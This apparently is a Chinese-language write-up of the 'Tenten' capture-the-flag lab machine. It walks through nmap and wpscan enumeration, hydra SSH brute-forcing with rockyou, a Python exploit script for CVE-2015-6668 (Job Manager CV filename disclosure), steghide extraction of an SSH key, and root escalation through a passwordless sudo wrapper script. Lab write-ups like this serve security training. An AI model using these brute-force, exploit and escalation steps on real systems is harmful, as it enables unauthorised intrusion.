Tenten(sudo -l)

10.10.10.10

1
2
3
4
5
6
7
8
9
10
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 ec:f7:9d:38:0c:47:6f:f0:13:0f:b9:3b:d4:d6:e3:11 (RSA)
|   256 cc:fe:2d:e2:7f:ef:4d:41:ae:39:0e:91:ed:7e:9d:e7 (ECDSA)
|_  256 8d:b5:83:18:c0:7c:5d:3d:38:df:4b:e1:a4:82:8a:07 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-generator: WordPress 4.7.3
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Job Portal – Just another WordPress site
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

command: wpscan --url 10.10.10.10 --enumerate

useful info:

1
2
3
4
Apache/2.4.18 (Ubuntu)
WordPress version 4.7.3
valid user: takis
http://10.10.10.10/wp-login.php
  • trying1 1 WordPress 2.3-4.8.3 - Host Header Injection in Password Reset

这是第二次遇到低版本wordpress,并验证主机头注入了,但第一次是邮件发送插件未安装,第二次直接500服务器错误。无语。

  • trying2 takis,以该用户名,burp intruder尝试弱密码。

  • trying3 openssh验证有效的用户,尝试弱密码 2

hydra -l takis -P /usr/share/wordlists/rockyou.txt 10.10.10.10 ssh

hydra -l takis -P /usr/share/wordlists/rockyou.txt -I 10.10.10.10 ssh -t 4

结果: [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

  • trying4:exp查找 search type:exploit wordpress cve:2016

像这种cms,又没检查出弱密码,又没有检查出可用exp,菜的不行==

writeup

当时我用wpscan,检查过了插件job manager。由于只有xss漏洞,所以没有在意。 4

32 vulnerabilities identified: –》 wpscan扫描结果有32个漏洞,再加上youtube上看到一些0day的exp演示视频,高大上的不行。成功把我这只菜鸟给绕糊涂了。 3

https://vagmour.eu/cve-2015-6668-cv-filename-disclosure-on-job-manager-wordpress-plugin/

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
import requests

print """  
CVE-2015-6668  
Title: CV filename disclosure on Job-Manager WP Plugin  
Author: Evangelos Mourikis  
Blog: https://vagmour.eu  
Plugin URL: http://www.wp-jobmanager.com  
Versions: <=0.7.25  
"""  
website = raw_input('Enter a vulnerable website: ')  
filename = raw_input('Enter a file name: ')

filename2 = filename.replace(" ", "-")

for year in range(2016,2018):  
    for i in range(1,13):
        for extension in {'jpg','jpeg','png'}:
            URL = website + "/wp-content/uploads/" + str(year) + "/" + "{:02}".format(i) + "/" + filename2 + "." + extension
            req = requests.get(URL)
            if req.status_code==200:
                print "[+] URL of CV found! " + URL

5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
wget 10.10.10.10/wp-content/uploads/2017/04/HackerAccessGranted.jpg

steghide extract -sf HackerAccessGranted.jpg

superpassword(通过hydra可得到)

chmod 400 id_rsa
ssh -i id_rsa takis@10.10.10.10

成功连接:
sudo -l
Matching Defaults entries for takis on tenten:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User takis may run the following commands on tenten:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: /bin/fuckin

---
file /bin/fuckin
/bin/fuckin: Bourne-Again shell script, ASCII text executable

---
cat /bin/fuckin
#!/bin/bash
$1 $2 $3 $4

对bash script变量不是很熟悉,于是在本地写一个,运行试一下。

6

1
2
3
4
5
6
7
8
9
10
11
$1 代表给脚本传递的第一个参数

$2 传递的第二个参数,以此类推

sudo /bin/fuckin su
因为/bin/fuckin不需要输入密码,并且以root运行,所以运行了su,获得root用户。

## 总结
要点是扫描到HackerAccessGranted的目录,通过cv文件名泄露漏洞,通过隐写术获取到id_rsa以及隐藏的密码

ssh登陆后,sudo -l利用权限错误,执行root权限即可。